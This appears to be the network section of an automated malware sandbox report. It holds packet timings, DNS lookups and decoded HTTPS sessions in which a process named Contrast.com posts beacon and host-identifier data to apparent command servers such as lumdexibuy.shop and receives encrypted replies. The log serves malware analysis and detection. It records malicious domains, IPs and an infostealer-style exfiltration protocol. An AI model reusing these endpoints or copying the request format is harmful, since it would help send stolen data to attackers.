                                                                                                                                      Nov 29, 2024 15:12:58.720720053 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:58.722843885 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:58.722857952 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:58.723098993 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:12:58.724425077 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:58.724653959 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:12:58.724685907 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.585036993 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.585110903 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.585160017 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.585350037 CET49809443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.585361958 CET44349809104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.638031960 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.638061047 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:01.638140917 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.638571024 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:01.638588905 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:02.934623003 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:02.934746027 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:02.936139107 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:02.936146021 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:02.936381102 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:02.937721968 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:02.937818050 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:02.937822104 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.438390970 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.438478947 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.438594103 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.438802958 CET49819443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.438816071 CET44349819104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.538002968 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.538039923 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:05.538156033 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.538547039 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:05.538558960 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:06.798089981 CET44349826104.21.63.229192.168.2.5
                                                                                                                                      Nov 29, 2024 15:13:06.798161983 CET49826443192.168.2.5104.21.63.229
                                                                                                                                      Nov 29, 2024 15:13:06.816840887 CET49826443192.168.2.5104.21.63.229
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2024 15:12:01.242522955 CET | 57660 | 53 | 192.168.2.5 | 1.1.1.1
Nov 29, 2024 15:12:01.480066061 CET | 53 | 57660 | 1.1.1.1 | 192.168.2.5
Nov 29, 2024 15:12:35.437309027 CET | 61565 | 53 | 192.168.2.5 | 1.1.1.1
Nov 29, 2024 15:12:35.832062960 CET | 53 | 61565 | 1.1.1.1 | 192.168.2.5
Nov 29, 2024 15:13:14.071378946 CET | 64986 | 53 | 192.168.2.5 | 1.1.1.1
Nov 29, 2024 15:13:14.208622932 CET | 53 | 64986 | 1.1.1.1 | 192.168.2.5
Nov 29, 2024 15:13:16.209474087 CET | 61883 | 53 | 192.168.2.5 | 1.1.1.1
Nov 29, 2024 15:13:16.430501938 CET | 53 | 61883 | 1.1.1.1 | 192.168.2.5
Nov 29, 2024 15:13:16.438179016 CET | 62063 | 53 | 192.168.2.5 | 1.1.1.1
Nov 29, 2024 15:13:16.760945082 CET | 53 | 62063 | 1.1.1.1 | 192.168.2.5
Nov 29, 2024 15:13:18.812175035 CET | 51645 | 53 | 192.168.2.5 | 1.1.1.1
Nov 29, 2024 15:13:19.043142080 CET | 53 | 51645 | 1.1.1.1 | 192.168.2.5
Nov 29, 2024 15:13:19.664017916 CET | 56319 | 53 | 192.168.2.5 | 1.1.1.1
Nov 29, 2024 15:13:19.979384899 CET | 53 | 56319 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2024 15:12:01.242522955 CET | 192.168.2.5 | 1.1.1.1 | 0xa2f0 | Standard query (0) | GJNYzyvbesUVEaJQoujpar.GJNYzyvbesUVEaJQoujpar | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:12:35.437309027 CET | 192.168.2.5 | 1.1.1.1 | 0xae11 | Standard query (0) | lumdexibuy.shop | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:14.071378946 CET | 192.168.2.5 | 1.1.1.1 | 0x90f5 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:16.209474087 CET | 192.168.2.5 | 1.1.1.1 | 0xb87a | Standard query (0) | cdn1.pixel-story.shop | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:16.438179016 CET | 192.168.2.5 | 1.1.1.1 | 0x80ec | Standard query (0) | silversky.club | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:18.812175035 CET | 192.168.2.5 | 1.1.1.1 | 0xd8bb | Standard query (0) | masa.r2cloudzugybyi8.shop | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:19.664017916 CET | 192.168.2.5 | 1.1.1.1 | 0x661 | Standard query (0) | snowqueen.site | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2024 15:12:01.480066061 CET | 1.1.1.1 | 192.168.2.5 | 0xa2f0 | Name error (3) | GJNYzyvbesUVEaJQoujpar.GJNYzyvbesUVEaJQoujpar | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:12:35.832062960 CET | 1.1.1.1 | 192.168.2.5 | 0xae11 | No error (0) | lumdexibuy.shop | | 104.21.63.229 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:12:35.832062960 CET | 1.1.1.1 | 192.168.2.5 | 0xae11 | No error (0) | lumdexibuy.shop | | 172.67.172.94 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:14.208622932 CET | 1.1.1.1 | 192.168.2.5 | 0x90f5 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:14.208622932 CET | 1.1.1.1 | 192.168.2.5 | 0x90f5 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:14.208622932 CET | 1.1.1.1 | 192.168.2.5 | 0x90f5 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:16.430501938 CET | 1.1.1.1 | 192.168.2.5 | 0xb87a | Name error (3) | cdn1.pixel-story.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:16.760945082 CET | 1.1.1.1 | 192.168.2.5 | 0x80ec | No error (0) | silversky.club | | 104.21.58.9 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:16.760945082 CET | 1.1.1.1 | 192.168.2.5 | 0x80ec | No error (0) | silversky.club | | 172.67.167.196 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:19.043142080 CET | 1.1.1.1 | 192.168.2.5 | 0xd8bb | Name error (3) | masa.r2cloudzugybyi8.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:13:19.979384899 CET | 1.1.1.1 | 192.168.2.5 | 0x661 | Name error (3) | snowqueen.site | none | none | A (IP address) | IN (0x0001) | false
• lumdexibuy.shop
• pastebin.com
• silversky.club
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49754 | 104.21.63.229 | 443 | 6180 | C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:12:37 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lumdexibuy.shop
2024-11-29 14:12:37 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-29 14:12:39 UTC | 1014 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:12:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=e0ms5u9kkhq046me15lbc4jfk3; expires=Tue, 25-Mar-2025 07:59:16 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzlfBWVXUs%2Ff7EjA7m5pxl6%2FPkTTAB2g3De5eN2SUa9G6ifDMcpWCIFMD89wR3VUrZTda9yeEADPYro%2BlniHJWl94fzA6NZHaNenxT8f8LqPc7wxE%2B9FGdf2NcsaTK5u9lM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea331955fff15d7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1683&rtt_var=645&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1679125&cwnd=225&unsent_bytes=0&cid=8aeb544195818665&ts=2547&x=0"
2024-11-29 14:12:39 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-29 14:12:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49764 | 104.21.63.229 | 443 | 6180 | C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:12:40 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 79
Host: lumdexibuy.shop
2024-11-29 14:12:40 UTC | 79 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 26 6a 3d 37 35 36 37 66 66 66 35 34 36 38 66 35 62 36 38 32 37 38 30 61 65 61 34 63 32 65 62 36 32 36 36
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--KASTA&j=7567fff5468f5b682780aea4c2eb6266
2024-11-29 14:12:43 UTC | 1024 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:12:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2qfqk2l8qpcc16pop7ok5flgg6; expires=Tue, 25-Mar-2025 07:59:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxXs1JtLGtasCRET9l8Va%2FsW%2B%2F7Typbqx3qts6j5dTIYu33QzjYuuBDkRrQljKePuyWf5SPn68edE1%2FMOFGxqhR9IV%2Fi%2B8KoX0%2FiYAIbbdwkVjgH%2FM%2FRybH2ITJcopmCmFk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea331adb8863338-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1819&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=978&delivery_rate=1530398&cwnd=245&unsent_bytes=0&cid=fb5c3d09b20e5e47&ts=2954&x=0"
                                                                                                                                      Data Ascii: YpVbVBJkh87jplTlsaRYPYueBCX8zO2E/xWy7m4TIlAz0BkGR3eU3zOlUHSntZC9Dt8PJnlMPgLtkOCs7IM1gTNV2kbF9oTIIucUpPMkGz+IXkTm/Q/tBT/XdCmu0qcToocIRcJkktyuIJOg9DUWPAjcRSMtCb2DbhdzvTmDIVExlVpFhXaHD2HgFieyIRq8yRxHJb9NL8Z81DPsLlNzgqKVXlQSZIlIoOed5nKny3sY2ZTnfh54FT8Vsq+sUWE
                                                                                                                                      2024-11-29 14:12:43 UTC193INData Raw: 55 57 48 70 4a 64 63 6f 6d 4b 47 63 71 47 75 55 72 47 62 31 34 70 32 75 74 33 6f 56 54 2f 56 6f 4c 73 2f 6b 43 4e 53 4d 4a 64 5a 78 6b 64 32 42 6f 35 67 70 6c 64 6e 73 2b 54 61 2f 49 6f 65 68 4b 65 2b 44 4f 2b 46 2f 74 56 7a 62 75 32 44 4d 41 45 7a 55 6f 68 53 46 48 33 42 44 6d 41 6c 42 6d 4e 69 49 38 74 39 43 45 2f 53 39 72 34 4d 4c 34 53 2f 56 62 44 73 72 5a 4a 68 6b 44 4c 56 47 63 54 48 74 59 57 4d 34 47 57 56 5a 7a 4d 6c 32 7a 2f 4a 6e 41 59 6e 37 52 33 2b 42 50 67 47 70 72 30 6a 30 2b 59 55 39 70 65 49 51 39 66 79 31 4d 31 67 74 49 42 30 73 65 45 5a 2f 6b 6a 65 0d 0a
                                                                                                                                      Data Ascii: UWHpJdcomKGcqGuUrGb14p2ut3oVT/VoLs/kCNSMJdZxkd2Bo5gpldns+Ta/IoehKe+DO+F/tVzbu2DMAEzUohSFH3BDmAlBmNiI8t9CE/S9r4ML4S/VbDsrZJhkDLVGcTHtYWM4GWVZzMl2z/JnAYn7R3+BPgGpr0j0+YU9peIQ9fy1M1gtIB0seEZ/kje
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 33 37 36 37 0d 0a 68 79 66 39 7a 61 2f 47 66 35 57 79 4c 32 32 53 6f 46 4e 32 46 46 74 48 68 62 63 48 7a 79 44 6d 46 71 66 68 74 67 74 39 44 55 2f 53 39 72 59 50 72 55 36 38 31 62 46 39 4b 45 43 6c 77 54 4e 58 69 46 49 55 64 34 5a 50 6f 65 53 55 4a 66 4f 6e 57 54 32 4c 48 51 57 6d 66 49 30 74 78 33 71 55 4d 47 36 76 55 43 43 51 73 74 52 63 78 67 59 6b 6c 31 79 69 59 6f 5a 79 6f 61 33 59 2f 34 35 65 41 50 61 36 33 65 68 56 50 39 57 67 75 7a 2b 54 34 39 4c 79 56 4e 73 46 68 6a 61 45 7a 53 4c 6e 56 53 63 77 5a 46 74 2f 69 4e 77 46 5a 4c 35 4e 62 4d 61 38 56 7a 43 74 62 51 4d 77 41 54 4e 53 69 46 49 55 65 49 51 4d 6f 36 4a 47 59 32 49 6a 79 33 30 49 54 39 4c 32 75 59 7a 73 52 54 37 56 63 57 77 74 55 43 4c 51 63 56 52 61 42 55 59 33 41 45 37 67 4a 70 52 6e 63
                                                                                                                                      Data Ascii: 3767hyf9za/Gf5WyL22SoFN2FFtHhbcHzyDmFqfhtgt9DU/S9rYPrU681bF9KEClwTNXiFIUd4ZPoeSUJfOnWT2LHQWmfI0tx3qUMG6vUCCQstRcxgYkl1yiYoZyoa3Y/45eAPa63ehVP9Wguz+T49LyVNsFhjaEzSLnVScwZFt/iNwFZL5NbMa8VzCtbQMwATNSiFIUeIQMo6JGY2Ijy30IT9L2uYzsRT7VcWwtUCLQcVRaBUY3AE7gJpRnc
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 4c 6e 41 51 6d 66 55 7a 71 67 62 30 55 38 71 78 73 6b 65 41 51 74 68 55 62 68 6b 53 30 52 6f 31 68 70 35 54 6b 63 48 57 49 37 4d 71 5a 31 50 43 74 42 71 76 42 50 55 61 33 66 71 6e 44 49 6c 49 69 67 6f 68 47 42 7a 61 47 54 61 4a 6e 31 36 55 7a 34 52 6b 39 69 4e 2f 46 35 48 37 50 37 77 58 2b 45 6a 45 73 4c 5a 50 67 30 6e 45 55 57 56 51 58 35 49 55 4b 73 37 4b 47 61 44 4c 6d 48 62 38 4b 6d 34 5a 32 75 74 33 6f 56 54 2f 56 6f 4c 73 2f 6b 69 41 56 73 46 54 61 68 73 66 31 52 77 33 68 4a 4a 57 6c 73 57 59 5a 76 49 75 64 78 36 58 2b 6a 4f 78 48 66 39 57 78 72 50 2b 41 73 35 44 30 68 49 35 55 44 72 7a 50 68 36 4a 69 42 6d 4e 69 49 38 74 39 43 45 2f 53 39 72 34 4d 4c 51 65 38 31 33 49 75 72 64 43 68 56 62 59 55 57 55 54 47 4e 45 55 4f 34 43 53 58 70 66 49 6b 57 7a
                                                                                                                                      Data Ascii: LnAQmfUzqgb0U8qxskeAQthUbhkS0Ro1hp5TkcHWI7MqZ1PCtBqvBPUa3fqnDIlIigohGBzaGTaJn16Uz4Rk9iN/F5H7P7wX+EjEsLZPg0nEUWVQX5IUKs7KGaDLmHb8Km4Z2ut3oVT/VoLs/kiAVsFTahsf1Rw3hJJWlsWYZvIudx6X+jOxHf9WxrP+As5D0hI5UDrzPh6JiBmNiI8t9CE/S9r4MLQe813IurdChVbYUWUTGNEUO4CSXpfIkWz
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 74 72 7a 4e 66 68 4d 75 46 76 4a 76 72 46 42 6a 55 4c 4a 57 57 51 61 45 4e 55 62 50 35 79 52 56 70 33 43 6c 6d 4c 31 4b 33 34 63 6e 50 4d 77 75 52 7a 2f 47 6f 7a 30 75 56 54 4f 48 49 70 38 5a 68 4d 56 6b 67 78 38 6c 39 4a 65 6e 6f 62 4f 4c 66 4d 6e 64 52 6d 55 39 44 36 71 45 76 46 61 77 61 61 39 53 6f 5a 43 78 6c 35 73 47 42 6a 53 46 6a 6d 44 6d 56 53 55 78 70 31 73 73 32 4d 2f 46 49 4b 30 59 66 67 6c 39 56 54 47 75 72 31 63 69 51 54 56 48 48 68 51 46 74 35 54 61 73 36 64 55 49 44 42 6b 32 58 36 4c 58 45 61 6b 2f 4d 39 75 78 58 38 56 73 32 39 76 55 53 50 54 4d 56 52 59 52 73 5a 32 42 49 38 69 39 49 58 30 73 47 4f 4c 61 74 74 55 42 43 66 2f 7a 6a 36 4d 2f 35 64 7a 76 53 68 41 70 63 45 7a 56 34 68 53 46 48 52 46 7a 79 48 6e 56 32 59 77 5a 5a 71 39 53 31 33
                                                                                                                                      Data Ascii: trzNfhMuFvJvrFBjULJWWQaENUbP5yRVp3ClmL1K34cnPMwuRz/Goz0uVTOHIp8ZhMVkgx8l9JenobOLfMndRmU9D6qEvFawaa9SoZCxl5sGBjSFjmDmVSUxp1ss2M/FIK0Yfgl9VTGur1ciQTVHHhQFt5Tas6dUIDBk2X6LXEak/M9uxX8Vs29vUSPTMVRYRsZ2BI8i9IX0sGOLattUBCf/zj6M/5dzvShApcEzV4hSFHRFzyHnV2YwZZq9S13
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 6e 2f 46 2b 70 49 78 4c 65 6f 54 38 6c 36 39 46 46 33 48 52 37 5a 45 67 79 77 76 46 53 54 78 5a 67 76 77 6a 74 79 41 35 6e 78 50 6f 59 71 39 6c 33 57 73 37 42 4b 6a 67 53 45 45 6d 35 51 53 65 74 54 65 73 36 74 46 39 4c 65 31 6a 57 7a 47 48 77 64 6c 50 4d 76 71 56 6e 62 54 4d 2b 37 74 55 33 4f 43 6f 70 55 49 55 68 42 6e 46 4d 32 6e 39 49 42 77 70 54 4e 4f 4b 42 36 4c 30 47 46 75 69 44 34 41 72 67 43 6b 50 72 2b 58 73 34 63 69 68 56 76 48 52 44 52 48 54 47 63 67 46 2b 52 30 4a 55 71 7a 52 4e 65 48 70 48 34 4e 4c 63 66 78 6d 54 6a 75 62 56 41 67 30 76 42 62 46 38 46 45 74 77 64 4e 5a 69 44 47 64 79 47 6d 53 32 72 46 44 39 62 32 73 74 33 2b 41 79 34 41 6f 4b 42 76 55 4b 41 51 39 78 44 4c 44 45 63 32 52 38 2f 67 5a 6b 5a 33 49 61 51 4c 61 74 39 4d 56 4f 65 35
                                                                                                                                      Data Ascii: n/F+pIxLeoT8l69FF3HR7ZEgywvFSTxZgvwjtyA5nxPoYq9l3Ws7BKjgSEEm5QSetTes6tF9Le1jWzGHwdlPMvqVnbTM+7tU3OCopUIUhBnFM2n9IBwpTNOKB6L0GFuiD4ArgCkPr+Xs4cihVvHRDRHTGcgF+R0JUqzRNeHpH4NLcfxmTjubVAg0vBbF8FEtwdNZiDGdyGmS2rFD9b2st3+Ay4AoKBvUKAQ9xDLDEc2R8/gZkZ3IaQLat9MVOe5
                                                                                                                                      2024-11-29 14:12:43 UTC1369INData Raw: 6f 58 4d 47 4b 67 47 65 43 51 73 31 49 5a 68 59 33 38 6c 4e 38 7a 70 30 5a 79 76 2f 57 4a 62 4d 53 4d 56 4f 43 74 47 48 34 49 66 74 55 7a 4c 4f 6f 58 63 4e 68 33 56 46 78 46 68 4b 53 58 58 4b 49 30 67 48 43 69 4e 5a 70 34 6d 30 6e 51 38 69 76 62 4f 74 44 71 41 6a 64 2b 71 63 4d 6d 41 53 53 41 43 39 51 41 35 4a 4c 63 73 6d 52 53 34 44 41 6c 58 76 77 61 6b 45 74 76 50 63 6f 73 6a 58 31 53 73 57 4b 67 46 6d 4e 53 73 52 56 64 77 46 52 6e 46 4d 39 7a 73 70 67 30 6f 37 61 61 2f 41 37 50 79 7a 55 74 43 48 34 54 4c 68 76 77 62 71 77 53 35 68 56 68 33 52 69 41 52 76 7a 48 69 4b 4a 30 68 66 53 77 4e 59 31 6f 47 4d 2f 46 34 75 30 59 65 68 47 6f 77 2b 52 34 2b 34 65 6b 51 72 54 45 6e 64 51 53 59 42 64 63 70 7a 53 41 64 4b 42 6c 58 2f 68 4b 33 77 46 6d 62 4d 48 68 69
                                                                                                                                      Data Ascii: oXMGKgGeCQs1IZhY38lN8zp0Zyv/WJbMSMVOCtGH4IftUzLOoXcNh3VFxFhKSXXKI0gHCiNZp4m0nQ8ivbOtDqAjd+qcMmASSAC9QA5JLcsmRS4DAlXvwakEtvPcosjX1SsWKgFmNSsRVdwFRnFM9zspg0o7aa/A7PyzUtCH4TLhvwbqwS5hVh3RiARvzHiKJ0hfSwNY1oGM/F4u0YehGow+R4+4ekQrTEndQSYBdcpzSAdKBlX/hK3wFmbMHhi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49775 | 104.21.63.229 | 443 | 6180 | C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:12:45 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=PZGP4FN1MNJN
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 12799
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:12:45 UTC12799OUTData Raw: 2d 2d 50 5a 47 50 34 46 4e 31 4d 4e 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 50 5a 47 50 34 46 4e 31 4d 4e 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 5a 47 50 34 46 4e 31 4d 4e 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 50 5a 47 50 34 46 4e 31 4d 4e 4a 4e 0d 0a
                                                                                                                                      Data Ascii: --PZGP4FN1MNJNContent-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--PZGP4FN1MNJNContent-Disposition: form-data; name="pid"2--PZGP4FN1MNJNContent-Disposition: form-data; name="lid"hRjzG3--KASTA--PZGP4FN1MNJN
2024-11-29 14:12:48 UTC | 1019 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:12:48 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=lmfdm13lbgt54fkp4oqot8k9ik; expires=Tue, 25-Mar-2025 07:59:25 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOarQa8KTGcPhjwJAHb%2BewoQARlcwl%2F4pj92riVMr%2B8EhMoZB0iZWsmRVYHAu6u1w4b0wQfTfPQtA1OqM53U1d%2BdGhqqNOQHu8%2BvIaVDApTqGpG38G5m3GOkjtt99rdYRvA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea331c9b80e43c4-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1611&rtt_var=606&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13732&delivery_rate=1812538&cwnd=222&unsent_bytes=0&cid=289b38fa4224ca87&ts=2890&x=0"
2024-11-29 14:12:48 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
2024-11-29 14:12:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49786 | 104.21.63.229 | 443 | 6180 | C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:12:49 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=4SWC7R2U0LS2
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 15041
                                                                                                                                      Host: lumdexibuy.shop
